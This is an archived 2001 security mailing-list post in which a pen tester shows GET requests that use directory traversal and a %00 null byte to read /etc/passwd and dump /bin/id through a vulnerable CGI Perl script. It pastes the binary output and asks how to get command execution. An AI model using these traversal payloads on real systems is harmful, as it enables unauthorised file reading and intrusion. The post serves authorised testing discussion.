vulnerable perl script?

• Previous message: Don Bailey: "Re: Lab leads??"
• Next in thread: Jay D. Dyson: "Re: vulnerable perl script?"
• Reply: Jay D. Dyson: "Re: vulnerable perl script?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi,

I'm doing a pen test and I found a perl script, which seems to be
vulnerable. If I do a get,
for
example:

GET
/cgi-bin/whatever.pl?variable1=test%00&variable2=../../../../../../etc/passwd%00

I can see the content of the passwd file. But when I try to execute a
command, for example:

GET
/cgi-bin/whatever.pl?variable1=test%00&variable2=../../../../../../bin/id%00

I get this garbage and some interesting stuff:


ELF



 t4P4
(4
4

�

��

��v�
DD�/usr/lib/ld.so.15HF$<#%C!-5AD,E0@2:(G8'4>3?;+B9&)*1/6= ".7
�

�
�
d
 

$
 <
 T
 t 
� 
� 
,

0

�&#338;
�4getopt_startgetpwuid_environ_end_iob_ex_register__flsbuf_GLOBAL_OFFSET_TABLE_geteuidatexitexitgettext_inittextdomainsetgrentgetuidgetpwnam___Argvsetbuf_DYNAMICgetgrentprintf__iobsetlocale_exit_ex_deregisterenvironperror__cg89_usedgetgrgid__cg92_usedgetegid__fnonstd_usedoptindstrcmp_edata_PROCEDURE_LINKAGE_TABLE___fsr_init_valuegetgroups_etext_lib_versiongetgidmain__environ_lock_finifprintfendgrentlibc.so.1SUNW_1.1libc.so.1


�
='&#8216;
��2�p/�:
...
more garbage
....
`���&#8364;�@@@�
&#8364;�2&#8364; �`&#8364;�
�&#8364;�&#8364;
&#376;�
�����SUNW_OST_OSCMDaid: invalid user name: "%s"
getgroupsgetgroups
groups=%u(%s)Usage: id [user] id
-a
[user]
%s%u%s%u%s=%u(%s)(%s)D00���
<0���
H0���
T0���
`0���
l0���
x0���
&#8222;0���
 T
 $
P ���&#8364;���8�������8
uid euid gid egid@(#)SunOS
5.7
Generic
October
1998.interp.hash.dynsym.dynstr.SUNW_version.rela.ex_shared.rela.bss.rela.plt.text.init.fini.exception_ranges.rodata.rodata1.got.plt.dynamic.ex_shared.data.data1.bss.comment.shstrtab


��
 
��
�

��&#8364;
dd&#382;
o���
   
-
 $ 



I'm not sure but I think, the %00 is the problem and without %00, I get no
results. Does anybody know how I can execute my commands? I tried ; and �,
but
nothing happened. I'm not able to see the source of the perl file.

any help would be appreciated

otaner


-- 
GMX - Die Kommunikationsplattform im Internet.
http://www.gmx.net


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

• Next message: otanerat_private: "Re:vulnerable perl script"
• Previous message: Don Bailey: "Re: Lab leads??"
• Next in thread: Jay D. Dyson: "Re: vulnerable perl script?"
• Reply: Jay D. Dyson: "Re: vulnerable perl script?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Oct 18 2001 - 10:54:21 PDT